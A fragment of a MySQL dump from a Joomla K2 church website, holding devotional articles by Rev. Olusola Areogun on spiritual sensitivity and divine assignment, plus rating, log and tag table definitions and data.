\":\"\",\"itemCommentsAnchor\":\"\",\"itemRating\":\"\",\"itemImage\":\"\",\"itemImgSize\":\"\",\"itemImageMainCaption\":\"\",\"itemImageMainCredits\":\"\",\"itemIntroText\":\"\",\"itemFullText\":\"\",\"itemExtraFields\":\"\",\"itemDateModified\":\"\",\"itemHits\":\"\",\"itemCategory\":\"\",\"itemTags\":\"\",\"itemAttachments\":\"\",\"itemAttachmentsCounter\":\"\",\"itemVideo\":\"\",\"itemVideoWidth\":\"\",\"itemVideoHeight\":\"\",\"itemAudioWidth\":\"\",\"itemAudioHeight\":\"\",\"itemVideoAutoPlay\":\"\",\"itemVideoCaption\":\"\",\"itemVideoCredits\":\"\",\"itemImageGallery\":\"\",\"itemImageGalleryWidth\":\"\",\"itemImageGalleryHeight\":\"\",\"itemNavigation\":\"\",\"itemComments\":\"\",\"itemTwitterButton\":\"\",\"itemFacebookButton\":\"\",\"itemGooglePlusOneButton\":\"\",\"itemAuthorBlock\":\"\",\"itemAuthorImage\":\"\",\"itemAuthorDescription\":\"\",\"itemAuthorURL\":\"\",\"itemAuthorEmail\":\"\",\"itemAuthorLatest\":\"\",\"itemAuthorLatestLimit\":\"\",\"itemRelated\":\"\",\"itemRelatedLimit\":\"\",\"itemRelatedTitle\":\"\",\"itemRelatedCategory\":\"\",\"itemRelatedImageSize\":\"\",\"itemRelatedIntrotext\":\"\",\"itemRelatedFulltext\":\"\",\"itemRelatedAuthor\":\"\",\"itemRelatedMedia\":\"\",\"itemRelatedImageGallery\":\"\",\"itemK2Plugins\":\"\"}', '', 'robots=\nauthor=', '', '', '*'),
(61, 'From our Father\'s Heart (26/08/2018)', 'from-our-father-s-heart-26-08-2018', 5, 1, '<p>Dearly Beloved,</p>\r\n<p>ENHANCING YOUR SENSITIVITY TO THE HOLY SPIRIT is one of the ways to break into the realm of exceeding abundantly above life.</p>\r\n<p><span lang=\"EN-GB\">There are four levels of sensitivity that is available to man:</span></p>\r\n', '\r\n<p><span lang=\"EN-GB\">1. No sensitivity at all</span></p>\r\n<p><span lang=\"EN-GB\">This is when the person is dense spiritually. A born again man can get to that place if he is not careful. </span></p>\r\n<p><span lang=\"EN-GB\">2. Low sensitivity </span></p>\r\n<p><span lang=\"EN-GB\">Jacob said in Genesis 26:18, “</span>Surely the LORD is in this place, and I did not know it.\" <span lang=\"EN-GB\">That is low sensitivity. </span></p>\r\n<p><span lang=\"EN-GB\">3. Sensitive </span></p>\r\n<p><span lang=\"EN-GB\">4. High sensitivity</span></p>\r\n<p><span lang=\"EN-GB\">Out of these four levels of sensitivity, two are dangerous: low and no sensitivity. Some people are working in a place that the winds and the danger there require a high level of sensitivity for them to survive. If you are going to be a senior military officer, a senior police officer etc., you need a high sensitivity. For you to be an effective minister of the Gospel, you need high sensitivity. </span></p>\r\n<p><span lang=\"EN-GB\">Pray for yourself that God is going to baptise you with a high level of sensitivity. Everything that has to do with your greatness will not come through your struggle but through your sensitivity. It’s not just any job that is alright for you but you need sensitivity to know the right job. People may wonder at a doctor going into hotel business, but that could be sensitivity guiding him even though it doesn’t sound normal. Sensitivity is what makes you to cross from a normal life to a great life.</span></p>\r\n<p><span lang=\"EN-GB\">Highlighted below are some of the steps to ENHANCING YOUR SENSITIVITY TO THE HOLY SPIRIT:</span></p>\r\n<p><span lang=\"EN-GB\"> 1. Maintain a pure conscience</span></p>\r\n<p>2. Feed more on the word of God</p>\r\n<p>3. Increase your confession of the word of God</p>\r\n<p>4. Fast regularly- fasting enhances your awareness of the spirit realm. It makes it easy for you to flow in the spirit realm. Nothing is as it appears whether good or bad. You may need to do away with meals sometimes.</p>\r\n<p>God lives in a world that all things are now. God is in yesterday, today and tomorrow.</p>\r\n<p>Why don\'t you let Him share that with you? He can tell you what to do that will guarantee you 10 years of abundance and stress-free life.</p>\r\n<p> </p>\r\n<p>5. Stay away from unanointed atmosphere- it can deaden your spirit. Avoid falling asleep in front of TV. Practice putting worship songs to play or listen to a message as you fall asleep.</p>\r\n<p> </p>\r\n<p>6. Maintain close contact with authentic gifts and callings of the Holy Spirit. You can’t be rubbing spirit with dead spirits and except to be sharpened.</p>\r\n<p> </p>\r\n<p>7- Allow the fruit of the Holy Spirit to work in your life. That is the place character is formed. A man manifesting the gifts of the Spirit with no character is not safe and he will not last in his journey with the Holy Spirit. God is committed to a man with character, than a man with gifts and no character.</p>\r\n<p> </p>\r\n<p>8. Avoid negative passion. It reduces your sensitivity to the Holy Spirit. You cannot be moody and be sensitive to the Holy Ghost. Be careful what you speak in the heat of negative passion. Most people that yield to negative passion do not have the flow. Learn to yield to positive passions.</p>\r\n<p> </p>\r\n<p>9. Avoid wrong association, ungodly and unholy alliances.</p>\r\n<p> </p>\r\n<p>10. Practise instant obedience to the Holy Spirit. This will heighten your signals. Disobedience to the Holy Spirit will embarrass you somewhere. Giving heed to lying spirit will weaken your sensitivity.</p>\r\n<p> </p>\r\n<p>Till next week, go and win with Jesus.</p>\r\n<p>God’s Servant,</p>\r\n<p>Rev. Olusola Areogun.</p>', NULL, NULL, '[]', '', '2018-08-24 15:17:03', 196, '', 196, '2018-08-24 15:18:44', '0000-00-00 00:00:00', 0, '2018-08-24 15:17:03', '0000-00-00 00:00:00', 0, 1, 30, 0, 0, '', '', '', '', 1447, '{\"catItemTitle\":\"\",\"catItemTitleLinked\":\"\",\"catItemFeaturedNotice\":\"\",\"catItemAuthor\":\"\",\"catItemDateCreated\":\"\",\"catItemRating\":\"\",\"catItemImage\":\"\",\"catItemIntroText\":\"\",\"catItemExtraFields\":\"\",\"catItemHits\":\"\",\"catItemCategory\":\"\",\"catItemTags\":\"\",\"catItemAttachments\":\"\",\"catItemAttachmentsCounter\":\"\",\"catItemVideo\":\"\",\"catItemVideoWidth\":\"\",\"catItemVideoHeight\":\"\",\"catItemAudioWidth\":\"\",\"catItemAudioHeight\":\"\",\"catItemVideoAutoPlay\":\"\",\"catItemImageGallery\":\"\",\"catItemImageGalleryWidth\":\"\",\"catItemImageGalleryHeight\":\"\",\"catItemDateModified\":\"\",\"catItemReadMore\":\"\",\"catItemCommentsAnchor\":\"\",\"catItemK2Plugins\":\"\",\"itemDateCreated\":\"\",\"itemTitle\":\"\",\"itemFeaturedNotice\":\"\",\"itemAuthor\":\"\",\"itemFontResizer\":\"\",\"itemPrintButton\":\"\",\"itemEmailButton\":\"\",\"itemSocialButton\":\"\",\"itemVideoAnchor\":\"\",\"itemImageGalleryAnchor\":\"\",\"itemCommentsAnchor\":\"\",\"itemRating\":\"\",\"itemImage\":\"\",\"itemImgSize\":\"\",\"itemImageMainCaption\":\"\",\"itemImageMainCredits\":\"\",\"itemIntroText\":\"\",\"itemFullText\":\"\",\"itemExtraFields\":\"\",\"itemDateModified\":\"\",\"itemHits\":\"\",\"itemCategory\":\"\",\"itemTags\":\"\",\"itemAttachments\":\"\",\"itemAttachmentsCounter\":\"\",\"itemVideo\":\"\",\"itemVideoWidth\":\"\",\"itemVideoHeight\":\"\",\"itemAudioWidth\":\"\",\"itemAudioHeight\":\"\",\"itemVideoAutoPlay\":\"\",\"itemVideoCaption\":\"\",\"itemVideoCredits\":\"\",\"itemImageGallery\":\"\",\"itemImageGalleryWidth\":\"\",\"itemImageGalleryHeight\":\"\",\"itemNavigation\":\"\",\"itemComments\":\"\",\"itemTwitterButton\":\"\",\"itemFacebookButton\":\"\",\"itemGooglePlusOneButton\":\"\",\"itemAuthorBlock\":\"\",\"itemAuthorImage\":\"\",\"itemAuthorDescription\":\"\",\"itemAuthorURL\":\"\",\"itemAuthorEmail\":\"\",\"itemAuthorLatest\":\"\",\"itemAuthorLatestLimit\":\"\",\"itemRelated\":\"\",\"itemRelatedLimit\":\"\",\"itemRelatedTitle\":\"\",\"itemRelatedCategory\":\"\",\"itemRelatedImageSize\":\"\",\"itemRelatedIntrotext\":\"\",\"itemRelatedFulltext\":\"\",\"itemRelatedAuthor\":\"\",\"itemRelatedMedia\":\"\",\"itemRelatedImageGallery\":\"\",\"itemK2Plugins\":\"\"}', '', 'robots=\nauthor=', '', '', '*'),
(60, 'From our Father\'s Heart (19/08/2018)', 'from-our-father-s-heart-02-08-2018', 5, 1, '<p><strong><span lang=\"EN-GB\">Dearly Beloved,</span></strong></p>\r\n<p><span lang=\"EN-GB\">I want to show you today some DON’TS OF THE HOLY SPIRIT you must avoid as you ENTER INTO THE WORLD OF THE HOLY SPIRIT. Taking note of these will keep you safe as you grow in your relationship with the Holy Spirit.</span> </p>\r\n<p>1. Don\'t ignore Him. One of the ways by which the Holy Spirit contacts us is through CONSTRAINT and RESTRAINT. Ignoring this communication of the Holy Spirit is preparing for a future of pain. Constraint means to make somebody do something by force or by strong persuasion, that is, something that limits one’s freedom of action. Constraint is a strong inner pressure to go ahead. Some versions of the Bible render constraint as compel. Therefore, it is possible for your spirit-man to compel you to do something. RESTRAINT is an equally strong inner pressure not to go ahead. Do not ignore Him whenever He brings the signals to you. You are only refreshed when you do what the spirit constrains you to do.<span style=\"font-size: 12.16px;\"> </span></p>\r\n', '\r\n<p>2. Don\'t grieve Him. Ephesians 4:30 says “ And grieve not the Holy Spirit of God, whereby ye are sealed unto the day of redemption.” Avoid like a plague activities that make a man to grieve the Holy Spirit. Wrath, anger, disobedience to a divine instruction, bitterness, evil-speaking, malice, envy, to mention a few are some of the activities that grieve the Holy Spirit. </p>\r\n<p>3. Don\'t take Him for granted. No man can stand the consequence of taking the Holy Spirit for granted, so don’t do it. </p>\r\n<p>4. Do not belittle Him by calling Him something or an influence. The Holy Spirit is not a thing or an influence, He is a person. Calling Him something or an influence is belittling His personality. Stop saying something tells me to do it as a born-again, recreated and renewed person. Stop trivializing divine communications from your spirit-man. </p>\r\n<p>5. Do not disobey Him. 1 Sam. 15:10-23. Do not disobey the instructions of the Holy Spirit. Saul the King of Israel did not recover from it. Make it your daily practice to obey Him. I made a decision many years ago that I WILL NOT WILLFULLY OR KNOWINGLY DISOBEY THE HOLY SPIRIT and I have kept to that till date. You can also do the same. These are decisions that keep your relationship safe with the Holy Spirit. </p>\r\n<p>6. Don\'t treat Him like a spare-tyre. Don’t have a sugar-daddy kind of relationship with the Holy Spirit. There are individuals that want to come to God only when they have problems and once the problem is solved, they return back to their former way of life. Don’t also come to Him after you have tried all the other things and it didn’t work out. Let the Holy Spirit be your first point of call in every situation of life. </p>\r\n<p>7. Do not trivialize His operations in you or through you. Holy Spirit operations in you will be a CUSTOMIZED OPERATION. You must develop confidence in Him. Once you break into the realms of the Holy Ghost, the realms of the exceeding abundantly above becomes your normal life. He knows where all the resources you need in this world are. </p>\r\n<p>8. Don\'t take the place of Jesus in anything. You must always allow Jesus to lead in the affairs of your life. Let Him BE LORD.</p>\r\n<p>9. Do not strive with Him. Gen. 6:3 says “And the LORD said, My spirit shall not always strive with man…….” I wrote a book LOSE TO WIN or WIN TO LOSE. When a man continually strives with the Holy Spirit, a time will come the Holy Spirit will LOSE TO HIM. When that happens, disaster is imminent. Never allow the Holy Spirit to LOSE TO YOU. You should lose to the Holy Spirit and eventually you will win at the end. </p>\r\n<p>10. Do not attack spiritual authorities. David said who will touch the Lord\'s anointed and be guiltless. When someone is operating under the anointing be careful. If you want the Holy Ghost to move in your life, be careful what you attack. If a leader fails and your conscience can\'t walk with him any longer, you have a right to walk away. Do not join people to attack spiritual authorities.</p>\r\n<p>It shall be well with you in Jesus name. </p>\r\n<p>Till next week, go and win with Jesus.</p>\r\n<p>God’s Servant,</p>\r\n<p>Rev. Olusola Areogun.</p>\r\n<p> </p>', NULL, NULL, '[]', '', '2018-08-24 15:08:29', 196, '', 0, '0000-00-00 00:00:00', '2018-08-24 15:18:53', 196, '2018-08-24 15:08:29', '0000-00-00 00:00:00', 0, 1, 29, 0, 0, '', '', '', '', 1029, '{\"catItemTitle\":\"\",\"catItemTitleLinked\":\"\",\"catItemFeaturedNotice\":\"\",\"catItemAuthor\":\"\",\"catItemDateCreated\":\"\",\"catItemRating\":\"\",\"catItemImage\":\"\",\"catItemIntroText\":\"\",\"catItemExtraFields\":\"\",\"catItemHits\":\"\",\"catItemCategory\":\"\",\"catItemTags\":\"\",\"catItemAttachments\":\"\",\"catItemAttachmentsCounter\":\"\",\"catItemVideo\":\"\",\"catItemVideoWidth\":\"\",\"catItemVideoHeight\":\"\",\"catItemAudioWidth\":\"\",\"catItemAudioHeight\":\"\",\"catItemVideoAutoPlay\":\"\",\"catItemImageGallery\":\"\",\"catItemImageGalleryWidth\":\"\",\"catItemImageGalleryHeight\":\"\",\"catItemDateModified\":\"\",\"catItemReadMore\":\"\",\"catItemCommentsAnchor\":\"\",\"catItemK2Plugins\":\"\",\"itemDateCreated\":\"\",\"itemTitle\":\"\",\"itemFeaturedNotice\":\"\",\"itemAuthor\":\"\",\"itemFontResizer\":\"\",\"itemPrintButton\":\"\",\"itemEmailButton\":\"\",\"itemSocialButton\":\"\",\"itemVideoAnchor\":\"\",\"itemImageGalleryAnchor\":\"\",\"itemCommentsAnchor\":\"\",\"itemRating\":\"\",\"itemImage\":\"\",\"itemImgSize\":\"\",\"itemImageMainCaption\":\"\",\"itemImageMainCredits\":\"\",\"itemIntroText\":\"\",\"itemFullText\":\"\",\"itemExtraFields\":\"\",\"itemDateModified\":\"\",\"itemHits\":\"\",\"itemCategory\":\"\",\"itemTags\":\"\",\"itemAttachments\":\"\",\"itemAttachmentsCounter\":\"\",\"itemVideo\":\"\",\"itemVideoWidth\":\"\",\"itemVideoHeight\":\"\",\"itemAudioWidth\":\"\",\"itemAudioHeight\":\"\",\"itemVideoAutoPlay\":\"\",\"itemVideoCaption\":\"\",\"itemVideoCredits\":\"\",\"itemImageGallery\":\"\",\"itemImageGalleryWidth\":\"\",\"itemImageGalleryHeight\":\"\",\"itemNavigation\":\"\",\"itemComments\":\"\",\"itemTwitterButton\":\"\",\"itemFacebookButton\":\"\",\"itemGooglePlusOneButton\":\"\",\"itemAuthorBlock\":\"\",\"itemAuthorImage\":\"\",\"itemAuthorDescription\":\"\",\"itemAuthorURL\":\"\",\"itemAuthorEmail\":\"\",\"itemAuthorLatest\":\"\",\"itemAuthorLatestLimit\":\"\",\"itemRelated\":\"\",\"itemRelatedLimit\":\"\",\"itemRelatedTitle\":\"\",\"itemRelatedCategory\":\"\",\"itemRelatedImageSize\":\"\",\"itemRelatedIntrotext\":\"\",\"itemRelatedFulltext\":\"\",\"itemRelatedAuthor\":\"\",\"itemRelatedMedia\":\"\",\"itemRelatedImageGallery\":\"\",\"itemK2Plugins\":\"\"}', '', 'robots=\nauthor=', '', '', '*'),
(62, 'Living the Divinely Assisted Life Part 2', 'living-the-divinely-assisted-life-part-2', 2, 1, '<p><strong>I</strong><strong>D</strong><strong>E</strong><strong>NTI</strong><strong>F</strong><strong>Y THE ASSIGNMENT FOR YOUR DESTINY</strong></p>\r\n<p>God&nbsp; made you for a purpose. If God&nbsp; called you to be a professional that is what you are anointed for. We are all&nbsp;made different from one another, but every child of God is&nbsp;to serve the purpose of God. God made Esther beautifully different from every other girl of her time. For her to have become the queen of Persia and not deliver Israel would have been to miss the purpose of God for giving her the throne. Wrong discipleship comes in when people get to the place of destiny and they have wrong purposes there.</p>\r\n<p>Once you find your assignment in the Kingdom, settle down and do it. Whether you are a governor, a president, a prime minister, a senator, a businessman or a housewife, God has an assignment for you. As a housewife, God had an assignment for Mary to provide a womb for Jesus to be born. He had an assignment for Joseph, a businessman, to provide a home atmosphere where Jesus could grow up in the disciplines of the Jewish religion, so that He could enter the ministry of a prophet under the Old Testament and He could fulfill His calling. Every child of God must know the assignment God raised him/her for. For Esther, she had to become queen so as to be able to have the clout and authority to speak to the king to counter Haman’s plot and facilitate the salvation of the people of God. That was what Mordecai told her in the book of Esther 4:14: “<em>Yet </em><em>who knows whether you have come to the kingdom &nbsp;for such a time as this?” </em>Her being at the king’s palace was not accidental; it was a deliberate, purposeful, timed, designed arrival. When you get to where you are going, it’s a process of God and you will be able to trace your journey and how God guided your steps.</p>\r\n<p><strong>DIVINE PROVISION FOR YOUR ASSIGNMENT</strong></p>\r\n<p>Understand that while we are here on earth, we are on official duty. Don’t forget that. God can make your life comfortable for your assignment. It’s amazing how people think that God is interested in their suffering, but you must have a balanced idea of what God planned for you. A sister who was in error once told me that God said I should give her ₦130,000 to buy land for her ministry. She said I should sell my car to do so and that God would give me a helicopter in return. You know that’s crazy! If I sold my car and I start to walk on foot, how does that help my ministry?</p>\r\n<p>Secondly, I was clear that my assignment at that time did not require a helicopter. I was using all my faith to fuel and service the car I had then, if I got a helicopter, where will I get money to pay the salary of the pilot and where will I park the helicopter? When you think about that, you know it was the devil that was speaking through that lady. But if my ministry requires a helicopter, God will send one. Whatever your assignment on the earth requires, that&nbsp; is what God funds. God funds the assignment He commits to your care. Ask yourself: Which of the things I am currently doing and labouring over is my divine assignment? Assignment is not the same as job. God will promote you at your job supernaturally and miraculously for your assignment, so you must find that assignment. If you don’t connect to assignment, there is no divine commitment to you.</p>\r\n<p></p>\r\n<p>God is not just interested in making you wealthy, but He is</p>\r\n<p>concerned with the purpose for the wealth. God is not going to take money from the hand of a foolish sinner and put it in the hand of a foolish Christian. He displaced Vashti and put Esther there who was going to use that place correctly and when she was about to miss it, Mordecai said, “...<em>maybe </em><em>you have come to the kingdom for such a time as this....” </em>Mordecai was in essence saying, “It means you have been prepared for this hour; this is the meaning to all your training. This is the reason why your father died and God ordered that I mentor you.”</p>\r\n<p><strong>DIFFERENT ACCOUNTS </strong><strong>T</strong><strong>O KEEP</strong></p>\r\n<p>God does not have to look at your bank account before he tells you to do something for him. If God is going to tell you to do something, he is going to look at what is in each of the accounts. These accounts were opened on your behalf but you may not be servicing those accounts, and they may be dormant. The devil has never been the problem of God’s people; it is the strength of our faith or the feebleness of our faith. You don’t have any problem really; you may need more faith or more wisdom somewhere but along these seven accounts you have to nurture and service them.</p>\r\n<p><strong>O</strong><strong>bedience Account: </strong>I have operated these account now for&nbsp;35 years and in an official capacity that God called me and showed me his plan for me. This is his purpose for my life and in this 36th year, I have not knowingly disobeyed the directions&nbsp;of God except the one I’m not sure that God wants me to do&nbsp;but I have obeyed all. Our salvation is the manifestation of the obedience of Jesus Christ. Your obedience and disobedience can have generational consequences. All these accounts are opened, angels are recording, God is watching it, and once he tells us to do something, he gives us that instructions in those accounts.</p>\r\n<p><strong>F</strong><strong>aith Account: </strong>You cannot cast your knowledge beyond the level of faith you have. If your faith is low, you won’t cast your fear upon God; you will carry your care yourself. It takes faith to cast your care on the Lord. As your faith grows, the capacity to interact beyond your faith you do not see will be increasing. When your faith is low, you tend to interact with the people and problems you see and it is very important that we live the life of faith. Understand that when you got born again, certain critical changes took place and you must know how to manage those changes.</p>\r\n<p><strong>W</strong><strong>isdom Account: </strong>It was the wisdom account that Solomon had that gave him his victory; not every born again person is wise. Wisdom is ability to use knowledge to your advantage and you have that account.</p>\r\n<p><strong>Rela</strong><strong>t</strong><strong>ionshi</strong><strong>p Account: </strong>One of the marks of wisdom that you see in people’s life is how they handle relationships in their life. You must be able to recognize critical relationships₦ whether it is small or big. Ability to recognize the people that belong to the past, to today and to tomorrow, and distinguish between them is very important because everybody in your&nbsp;life belongs to one of these three periods: yesterday, today and tomorrow. You have to learn how to handle relationships because there are some things that&nbsp; you do not have but another person that you know will have. How strong is your relationship with God? There are men that God will bring cross your path for different reasons and you have to be sensitive about that.</p>\r\n<p><strong>Calling Account: </strong>You have an account of the calling before you were born. God called you as a spirit and put you in a body as a human body.</p>\r\n<p><strong>Anointing Account: </strong>And then you are here to go with your calling an anointing. The anointing makes the calling easy and walkable.</p>', '', NULL, NULL, '[]', '', '2019-07-17 15:57:55', 196, '', 0, '0000-00-00 00:00:00', '0000-00-00 00:00:00', 0, '2019-07-17 15:57:55', '0000-00-00 00:00:00', 0, 1, 21, 0, 0, '', '', '', '', 339, '{\"catItemTitle\":\"\",\"catItemTitleLinked\":\"\",\"catItemFeaturedNotice\":\"\",\"catItemAuthor\":\"\",\"catItemDateCreated\":\"\",\"catItemRating\":\"\",\"catItemImage\":\"\",\"catItemIntroText\":\"\",\"catItemExtraFields\":\"\",\"catItemHits\":\"\",\"catItemCategory\":\"\",\"catItemTags\":\"\",\"catItemAttachments\":\"\",\"catItemAttachmentsCounter\":\"\",\"catItemVideo\":\"\",\"catItemVideoWidth\":\"\",\"catItemVideoHeight\":\"\",\"catItemAudioWidth\":\"\",\"catItemAudioHeight\":\"\",\"catItemVideoAutoPlay\":\"\",\"catItemImageGallery\":\"\",\"catItemImageGalleryWidth\":\"\",\"catItemImageGalleryHeight\":\"\",\"catItemDateModified\":\"\",\"catItemReadMore\":\"\",\"catItemCommentsAnchor\":\"\",\"catItemK2Plugins\":\"\",\"itemDateCreated\":\"\",\"itemTitle\":\"\",\"itemFeaturedNotice\":\"\",\"itemAuthor\":\"\",\"itemFontResizer\":\"\",\"itemPrintButton\":\"\",\"itemEmailButton\":\"\",\"itemSocialButton\":\"\",\"itemVideoAnchor\":\"\",\"itemImageGalleryAnchor\":\"\",\"itemCommentsAnchor\":\"\",\"itemRating\":\"\",\"itemImage\":\"\",\"itemImgSize\":\"\",\"itemImageMainCaption\":\"\",\"itemImageMainCredits\":\"\",\"itemIntroText\":\"\",\"itemFullText\":\"\",\"itemExtraFields\":\"\",\"itemDateModified\":\"\",\"itemHits\":\"\",\"itemCategory\":\"\",\"itemTags\":\"\",\"itemAttachments\":\"\",\"itemAttachmentsCounter\":\"\",\"itemVideo\":\"\",\"itemVideoWidth\":\"\",\"itemVideoHeight\":\"\",\"itemAudioWidth\":\"\",\"itemAudioHeight\":\"\",\"itemVideoAutoPlay\":\"\",\"itemVideoCaption\":\"\",\"itemVideoCredits\":\"\",\"itemImageGallery\":\"\",\"itemImageGalleryWidth\":\"\",\"itemImageGalleryHeight\":\"\",\"itemNavigation\":\"\",\"itemComments\":\"\",\"itemTwitterButton\":\"\",\"itemFacebookButton\":\"\",\"itemGooglePlusOneButton\":\"\",\"itemAuthorBlock\":\"\",\"itemAuthorImage\":\"\",\"itemAuthorDescription\":\"\",\"itemAuthorURL\":\"\",\"itemAuthorEmail\":\"\",\"itemAuthorLatest\":\"\",\"itemAuthorLatestLimit\":\"\",\"itemRelated\":\"\",\"itemRelatedLimit\":\"\",\"itemRelatedTitle\":\"\",\"itemRelatedCategory\":\"\",\"itemRelatedImageSize\":\"\",\"itemRelatedIntrotext\":\"\",\"itemRelatedFulltext\":\"\",\"itemRelatedAuthor\":\"\",\"itemRelatedMedia\":\"\",\"itemRelatedImageGallery\":\"\",\"itemK2Plugins\":\"\"}', '', 'robots=\nauthor=', '', '', '*'),
(63, 'Ways to Increase your Sensitivity', 'sensitivity', 2, 1, '<div class=\"itemIntroText\">\r\n<p>Today, I want to share with you ways that you can increase your spiritual sensitivity.</p>\r\n<ol>\r\n<li>Stay away from un anointed atmosphere. Create an atmosphere of the anointing by constant worship, praise, and regularly listening to messages.</li>\r\n</ol></div>\r\n<div class=\"itemFullText\">', '\r\n<ul>\r\n<li>Maintain close contact with authentic gift and calling of the Holy Spirit. Stop staying around strange spiritual influences, false prophets, and people that operate in falsehood. Find a genuine minister around you, listen to them and attend their ministry.</li>\r\n<li>Increase your intake of the word of God. One of the signs of spiritual sickness is losing appetite for the word of God. Study the Bible regularly. Read the bible through in a year.</li>\r\n<li>Increase your confession of the word of God. Your words affect your spirit.</li>\r\n<li>Regular fasting. Fasting is a booster to spiritual activities. Majority of Christians are struggling because they can’t get to the frequency that God is communicating with them. You should note that fasting does not change God, fasting changes you. Fasting fine-tunes your frequency to the frequency of the Holy Spirit. If you’re not concentrating on something spiritual, you are not fasting but just doing hunger strike. Don’t use fasting to bribe God to change His mind concerning a matter.</li>\r\n<li>Allow the fruit of the Spirit to grow in you.</li>\r\n<li>Reduce emotionalism. Don’t let your emotions or another person’s emotions rule you. Negative passion reduces spiritual sensitivity. Anger, wrath, malice, offences are all enemies of spiritual sensitivity.</li>\r\n<li>Spend more time speaking in tongue.</li>\r\n<li>Instant obedience to divine signal. Divine signals come through your conscience.</li>\r\n<li>Learning to rebuke wrong spirits. Cast down every evil imagination, any anything that is against the knowledge of God. Learn to walk with the Lord until your heart is stronger than your brain, body, and men’s opinion. Your body language in the presence of God will signal the attitude of God towards you.</li>\r\n</ul>\r\n</div>', NULL, NULL, '[]', '', '2019-08-05 22:08:01', 196, '', 196, '2019-08-05 22:14:42', '2019-08-05 22:14:41', 196, '2019-08-05 22:08:01', '0000-00-00 00:00:00', 0, 1, 22, 0, 0, '', '', '', '', 287, '{\"catItemTitle\":\"\",\"catItemTitleLinked\":\"\",\"catItemFeaturedNotice\":\"\",\"catItemAuthor\":\"\",\"catItemDateCreated\":\"\",\"catItemRating\":\"\",\"catItemImage\":\"\",\"catItemIntroText\":\"\",\"catItemExtraFields\":\"\",\"catItemHits\":\"\",\"catItemCategory\":\"\",\"catItemTags\":\"\",\"catItemAttachments\":\"\",\"catItemAttachmentsCounter\":\"\",\"catItemVideo\":\"\",\"catItemVideoWidth\":\"\",\"catItemVideoHeight\":\"\",\"catItemAudioWidth\":\"\",\"catItemAudioHeight\":\"\",\"catItemVideoAutoPlay\":\"\",\"catItemImageGallery\":\"\",\"catItemImageGalleryWidth\":\"\",\"catItemImageGalleryHeight\":\"\",\"catItemDateModified\":\"\",\"catItemReadMore\":\"\",\"catItemCommentsAnchor\":\"\",\"catItemK2Plugins\":\"\",\"itemDateCreated\":\"\",\"itemTitle\":\"\",\"itemFeaturedNotice\":\"\",\"itemAuthor\":\"\",\"itemFontResizer\":\"\",\"itemPrintButton\":\"\",\"itemEmailButton\":\"\",\"itemSocialButton\":\"\",\"itemVideoAnchor\":\"\",\"itemImageGalleryAnchor\":\"\",\"itemCommentsAnchor\":\"\",\"itemRating\":\"\",\"itemImage\":\"\",\"itemImgSize\":\"\",\"itemImageMainCaption\":\"\",\"itemImageMainCredits\":\"\",\"itemIntroText\":\"\",\"itemFullText\":\"\",\"itemExtraFields\":\"\",\"itemDateModified\":\"\",\"itemHits\":\"\",\"itemCategory\":\"\",\"itemTags\":\"\",\"itemAttachments\":\"\",\"itemAttachmentsCounter\":\"\",\"itemVideo\":\"\",\"itemVideoWidth\":\"\",\"itemVideoHeight\":\"\",\"itemAudioWidth\":\"\",\"itemAudioHeight\":\"\",\"itemVideoAutoPlay\":\"\",\"itemVideoCaption\":\"\",\"itemVideoCredits\":\"\",\"itemImageGallery\":\"\",\"itemImageGalleryWidth\":\"\",\"itemImageGalleryHeight\":\"\",\"itemNavigation\":\"\",\"itemComments\":\"\",\"itemTwitterButton\":\"\",\"itemFacebookButton\":\"\",\"itemGooglePlusOneButton\":\"\",\"itemAuthorBlock\":\"\",\"itemAuthorImage\":\"\",\"itemAuthorDescription\":\"\",\"itemAuthorURL\":\"\",\"itemAuthorEmail\":\"\",\"itemAuthorLatest\":\"\",\"itemAuthorLatestLimit\":\"\",\"itemRelated\":\"\",\"itemRelatedLimit\":\"\",\"itemRelatedTitle\":\"\",\"itemRelatedCategory\":\"\",\"itemRelatedImageSize\":\"\",\"itemRelatedIntrotext\":\"\",\"itemRelatedFulltext\":\"\",\"itemRelatedAuthor\":\"\",\"itemRelatedMedia\":\"\",\"itemRelatedImageGallery\":\"\",\"itemK2Plugins\":\"\"}', '', 'robots=\nauthor=', '', '', '*');

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_k2_log`
--

CREATE TABLE `y57u5_k2_log` (
  `status` int(11) NOT NULL,
  `response` text NOT NULL,
  `timestamp` datetime NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

--
-- Dumping data for table `y57u5_k2_log`
--

INSERT INTO `y57u5_k2_log` (`status`, `response`, `timestamp`) VALUES
(200, 'Anonymous metrics submitted - thank you for helping make K2 better!', '2019-08-27 14:30:25');

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_k2_rating`
--

CREATE TABLE `y57u5_k2_rating` (
  `itemID` int(11) NOT NULL DEFAULT '0',
  `rating_sum` int(11) UNSIGNED NOT NULL DEFAULT '0',
  `rating_count` int(11) UNSIGNED NOT NULL DEFAULT '0',
  `lastip` varchar(50) NOT NULL DEFAULT ''
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Dumping data for table `y57u5_k2_rating`
--

INSERT INTO `y57u5_k2_rating` (`itemID`, `rating_sum`, `rating_count`, `lastip`) VALUES
(1, 10, 2, '::1'),
(4, 10, 2, '::1'),
(2, 20, 4, '::1'),
(10, 26, 6, '66.248.203.2'),
(11, 8, 2, '185.93.228.2'),
(12, 10, 2, '185.93.228.21'),
(55, 36, 8, '66.248.202.2'),
(54, 34, 8, '185.93.228.22'),
(36, 32, 7, '185.93.228.2'),
(34, 4, 2, '66.248.203.2'),
(7, 4, 1, '185.93.228.2'),
(56, 26, 6, '185.93.228.2'),
(51, 10, 2, '185.93.228.2'),
(42, 5, 1, '185.93.228.2'),
(40, 5, 1, '185.93.228.2'),
(32, 1, 1, '66.248.203.2'),
(35, 7, 2, '185.93.228.2'),
(60, 10, 2, '185.93.228.2'),
(15, 4, 1, '185.93.228.2'),
(62, 5, 1, '66.248.203.2'),
(14, 5, 1, '185.93.228.2'),
(25, 5, 1, '185.93.228.2'),
(8, 5, 1, '185.93.228.2'),
(61, 8, 2, '192.88.135.2'),
(52, 1, 1, '66.248.202.2'),
(47, 1, 1, '66.248.202.2'),
(63, 5, 1, '185.93.229.2');

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_k2_tags`
--

CREATE TABLE `y57u5_k2_tags` (
  `id` int(11) NOT NULL,
  `name` varchar(255) NOT NULL,
  `published` smallint(6) NOT NULL DEFAULT '0'
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Dumping data for table `y57u5_k2_tags`
--

